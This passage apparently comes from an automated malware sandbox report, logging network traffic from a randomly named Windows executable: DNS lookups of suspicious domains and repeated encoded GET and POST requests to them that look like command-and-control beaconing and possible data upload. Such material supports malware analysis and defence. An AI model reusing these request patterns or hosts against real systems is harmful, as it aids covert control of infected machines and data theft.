                                                  Jan 10, 2025 20:11:51.562371016 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.562391043 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.564650059 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.564671993 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.564770937 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.564800978 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.564812899 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.564851046 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.574672937 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.574686050 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.574700117 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.574729919 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.574743032 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.574784040 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.711133957 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.711175919 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.711188078 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.711203098 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.711216927 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.711245060 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.711282015 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.711589098 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.711601973 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.711615086 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.711627007 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.711638927 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.711647034 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.711653948 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.711684942 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.712392092 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.712434053 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.712450027 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.712492943 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.719260931 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.719274044 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.719307899 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.719336987 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.719361067 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.719378948 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.723278046 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.723289967 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.723334074 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.723556995 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.723603010 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.723613977 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.733324051 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.733336926 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.733361006 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.733392954 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.733407974 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.733414888 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.753453016 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.753465891 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.753529072 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.753542900 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.753555059 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.753592014 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.771944046 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.771974087 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.771990061 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.772001982 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.772013903 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.772031069 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.796559095 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.796571970 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.796616077 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.796617985 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.796626091 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.796660900 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.805020094 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.805036068 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.805047989 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.805077076 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.805109978 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.814078093 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.814107895 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.814194918 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.814235926 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.814248085 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.814275026 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.824542999 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.824554920 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.824589968 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.824600935 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.824630976 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.824675083 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.828649998 CET6452880192.168.2.963.250.43.134
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 20:10:15.522737980 CET | 53 | 55235 | 162.159.36.2 | 192.168.2.9
Jan 10, 2025 20:10:16.095263958 CET | 49170 | 53 | 192.168.2.9 | 1.1.1.1
Jan 10, 2025 20:10:16.114404917 CET | 53 | 49170 | 1.1.1.1 | 192.168.2.9
Jan 10, 2025 20:10:50.011476994 CET | 59645 | 53 | 192.168.2.9 | 1.1.1.1
Jan 10, 2025 20:10:50.503803968 CET | 53 | 59645 | 1.1.1.1 | 192.168.2.9
Jan 10, 2025 20:11:06.472484112 CET | 59685 | 53 | 192.168.2.9 | 1.1.1.1
Jan 10, 2025 20:11:06.486460924 CET | 53 | 59685 | 1.1.1.1 | 192.168.2.9
Jan 10, 2025 20:11:19.988236904 CET | 62136 | 53 | 192.168.2.9 | 1.1.1.1
Jan 10, 2025 20:11:20.005752087 CET | 53 | 62136 | 1.1.1.1 | 192.168.2.9
Jan 10, 2025 20:11:33.363230944 CET | 64904 | 53 | 192.168.2.9 | 1.1.1.1
Jan 10, 2025 20:11:33.382097006 CET | 53 | 64904 | 1.1.1.1 | 192.168.2.9
Jan 10, 2025 20:11:47.131067991 CET | 62351 | 53 | 192.168.2.9 | 1.1.1.1
Jan 10, 2025 20:11:47.148787975 CET | 53 | 62351 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 20:10:16.095263958 CET | 192.168.2.9 | 1.1.1.1 | 0x4f17 | Standard query (0) | 171.39.242.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Jan 10, 2025 20:10:50.011476994 CET | 192.168.2.9 | 1.1.1.1 | 0x79a | Standard query (0) | www.qqa79.top | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:11:06.472484112 CET | 192.168.2.9 | 1.1.1.1 | 0xc10b | Standard query (0) | www.1secondlending.one | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:11:19.988236904 CET | 192.168.2.9 | 1.1.1.1 | 0xc4c9 | Standard query (0) | www.supernutra01.online | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:11:33.363230944 CET | 192.168.2.9 | 1.1.1.1 | 0x24ef | Standard query (0) | www.wine-drinkers.club | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:11:47.131067991 CET | 192.168.2.9 | 1.1.1.1 | 0xb585 | Standard query (0) | www.oneeyetrousersnake.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 20:10:16.114404917 CET | 1.1.1.1 | 192.168.2.9 | 0x4f17 | Name error (3) | 171.39.242.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Jan 10, 2025 20:10:50.503803968 CET | 1.1.1.1 | 192.168.2.9 | 0x79a | No error (0) | www.qqa79.top | qqa79.top | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 20:10:50.503803968 CET | 1.1.1.1 | 192.168.2.9 | 0x79a | No error (0) | qqa79.top | | 38.47.233.21 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:11:06.486460924 CET | 1.1.1.1 | 192.168.2.9 | 0xc10b | No error (0) | www.1secondlending.one | | 43.205.198.29 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:11:20.005752087 CET | 1.1.1.1 | 192.168.2.9 | 0xc4c9 | No error (0) | www.supernutra01.online | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:11:20.005752087 CET | 1.1.1.1 | 192.168.2.9 | 0xc4c9 | No error (0) | www.supernutra01.online | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:11:33.382097006 CET | 1.1.1.1 | 192.168.2.9 | 0x24ef | No error (0) | www.wine-drinkers.club | | 194.245.148.189 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:11:47.148787975 CET | 1.1.1.1 | 192.168.2.9 | 0xb585 | No error (0) | www.oneeyetrousersnake.xyz | oneeyetrousersnake.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 20:11:47.148787975 CET | 1.1.1.1 | 192.168.2.9 | 0xb585 | No error (0) | oneeyetrousersnake.xyz | | 63.250.43.134 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:11:47.148787975 CET | 1.1.1.1 | 192.168.2.9 | 0xb585 | No error (0) | oneeyetrousersnake.xyz | | 63.250.43.135 | A (IP address) | IN (0x0001) | false
                                                  • www.qqa79.top
                                                  • www.1secondlending.one
                                                  • www.supernutra01.online
                                                  • www.wine-drinkers.club
                                                  • www.oneeyetrousersnake.xyz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 64514 | 38.47.233.21 | 80 | 6568 | C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 20:10:50.526536942 CET | 436 | OUT | GET /mz0w/?rdmhfXe=uMzU0JGK22aEYJLCyAIreKcU1rJUCkGv0SPCs66KRtTFzrJJ373CiBnwq6iLrm6CBfWGplZZf3wVkFmev9wwp4pfrJHMjCh6luBqHWNFeR0cmEvsKw==&AF=At8pGDY0Z HTTP/1.1
Host: www.qqa79.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-us
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Jan 10, 2025 20:10:51.433765888 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 10 Jan 2025 19:10:51 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 64515 | 43.205.198.29 | 80 | 6568 | C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 20:11:06.509505987 CET | 721 | OUT | POST /6pwo/ HTTP/1.1
Host: www.1secondlending.one
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Content-Length: 196
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Origin: http://www.1secondlending.one
Referer: http://www.1secondlending.one/6pwo/
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Data Raw: 72 64 6d 68 66 58 65 3d 44 65 77 72 42 73 32 6d 54 39 6c 6d 71 53 30 68 38 78 6f 2f 46 68 77 57 47 42 70 4b 5a 57 54 4e 50 78 35 6e 73 32 31 56 41 55 6b 6f 62 58 71 71 64 5a 45 48 53 51 4e 7a 6c 79 46 4d 68 37 69 6b 39 2f 4f 64 72 48 41 61 4d 6b 41 70 41 52 62 65 75 55 6e 4f 6a 32 6f 30 62 45 72 51 73 41 4d 41 75 39 32 55 4a 41 6b 6d 76 37 63 4a 50 38 4c 6a 75 6a 79 62 56 76 61 63 51 75 6c 79 67 38 63 30 36 70 59 6f 41 75 33 37 65 6e 6a 69 67 6f 50 45 5a 38 63 68 6c 49 65 57 43 4d 6b 65 55 53 58 79 74 58 62 6a 43 72 4c 38 6c 56 70 73 6e 47 52 36 52 67 69 30 6e 48 30 46 78 35 78 51
                                                  Data Ascii: rdmhfXe=DewrBs2mT9lmqS0h8xo/FhwWGBpKZWTNPx5ns21VAUkobXqqdZEHSQNzlyFMh7ik9/OdrHAaMkApARbeuUnOj2o0bErQsAMAu92UJAkmv7cJP8LjujybVvacQulyg8c06pYoAu37enjigoPEZ8chlIeWCMkeUSXytXbjCrL8lVpsnGR6Rgi0nH0Fx5xQ
Jan 10, 2025 20:11:07.355613947 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 10 Jan 2025 19:11:07 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 64516 | 43.205.198.29 | 80 | 6568 | C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 20:11:09.054383039 CET | 745 | OUT | POST /6pwo/ HTTP/1.1
Host: www.1secondlending.one
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Content-Length: 220
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Origin: http://www.1secondlending.one
Referer: http://www.1secondlending.one/6pwo/
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Data Raw: 72 64 6d 68 66 58 65 3d 44 65 77 72 42 73 32 6d 54 39 6c 6d 70 78 38 68 35 53 77 2f 4e 68 77 56 4e 68 70 4b 51 32 54 4a 50 78 31 6e 73 33 67 4f 41 69 55 6f 62 31 79 71 61 63 77 48 52 51 4e 7a 78 69 46 56 76 62 69 76 39 2f 53 2f 72 47 4d 61 4d 67 6f 70 41 52 4c 65 75 6a 7a 50 69 6d 6f 4d 57 6b 72 53 7a 77 4d 41 75 39 32 55 4a 41 67 49 76 37 45 4a 4d 50 54 6a 76 47 47 59 57 76 61 66 47 2b 6c 79 6b 38 63 34 36 70 5a 48 41 71 33 42 65 6c 62 69 67 74 72 45 5a 76 45 69 73 49 66 38 47 4d 6c 58 46 51 43 56 72 67 58 6c 49 61 71 59 6b 47 38 51 67 6e 74 6b 41 53 72 76 79 51 30 69 32 65 34 34 6c 39 56 4d 4c 4a 62 77 4f 50 4a 45 63 46 30 59 63 46 38 65 52 77 3d 3d
                                                  Data Ascii: rdmhfXe=DewrBs2mT9lmpx8h5Sw/NhwVNhpKQ2TJPx1ns3gOAiUob1yqacwHRQNzxiFVvbiv9/S/rGMaMgopARLeujzPimoMWkrSzwMAu92UJAgIv7EJMPTjvGGYWvafG+lyk8c46pZHAq3BelbigtrEZvEisIf8GMlXFQCVrgXlIaqYkG8QgntkASrvyQ0i2e44l9VMLJbwOPJEcF0YcF8eRw==
Jan 10, 2025 20:11:09.893371105 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 10 Jan 2025 19:11:09 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 64517 | 43.205.198.29 | 80 | 6568 | C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 20:11:11.602024078 CET | 1758 | OUT | POST /6pwo/ HTTP/1.1
Host: www.1secondlending.one
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Content-Length: 1232
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Origin: http://www.1secondlending.one
Referer: http://www.1secondlending.one/6pwo/
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Data Raw: 72 64 6d 68 66 58 65 3d 44 65 77 72 42 73 32 6d 54 39 6c 6d 70 78 38 68 35 53 77 2f 4e 68 77 56 4e 68 70 4b 51 32 54 4a 50 78 31 6e 73 33 67 4f 41 69 63 6f 62 41 75 71 61 37 73 48 51 51 4e 7a 79 69 46 51 76 62 69 2b 39 2f 4b 37 72 47 51 56 4d 6d 73 70 42 79 54 65 73 53 7a 50 6f 6d 6f 4d 4b 55 72 52 73 41 4d 76 75 39 6d 71 4a 44 49 49 76 37 45 4a 4d 4f 6a 6a 76 54 79 59 51 76 61 63 51 75 6c 45 67 38 63 63 36 70 77 77 41 71 37 72 65 52 76 69 67 4e 62 45 63 64 63 69 77 59 65 61 4c 73 6c 50 46 51 65 4b 72 6d 7a 70 49 61 76 4e 6b 47 45 51 6c 52 4d 39 48 79 6e 48 76 54 6f 57 77 4e 6b 67 72 64 4a 71 55 4a 76 73 5a 74 70 79 41 33 59 54 58 57 5a 4a 4c 53 66 37 61 2b 73 73 31 4f 4e 5a 68 56 67 6c 41 73 57 30 56 74 76 77 63 58 70 76 47 54 7a 48 37 44 64 4b 45 37 6d 4e 33 61 44 57 32 6d 75 2f 54 6a 2b 71 66 36 4c 45 63 4b 2b 76 52 39 79 7a 57 75 34 35 45 4a 43 46 59 79 71 45 30 2b 44 52 6d 44 77 54 75 79 47 6f 4d 42 41 6c 73 41 56 35 45 51 71 57 54 74 68 52 71 56 65 6d 35 32 33 4d 6a 72 31 47 38 4f 78 58 4a 62 [TRUNCATED]
                                                  Data Ascii: rdmhfXe= [TRUNCATED]
                                                  Jan 10, 2025 20:11:12.451793909 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Fri, 10 Jan 2025 19:11:12 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 548
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  4 | 192.168.2.9 | 64518 | 43.205.198.29 | 80 | 6568 | C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  Timestamp | Bytes transferred | Direction | Data
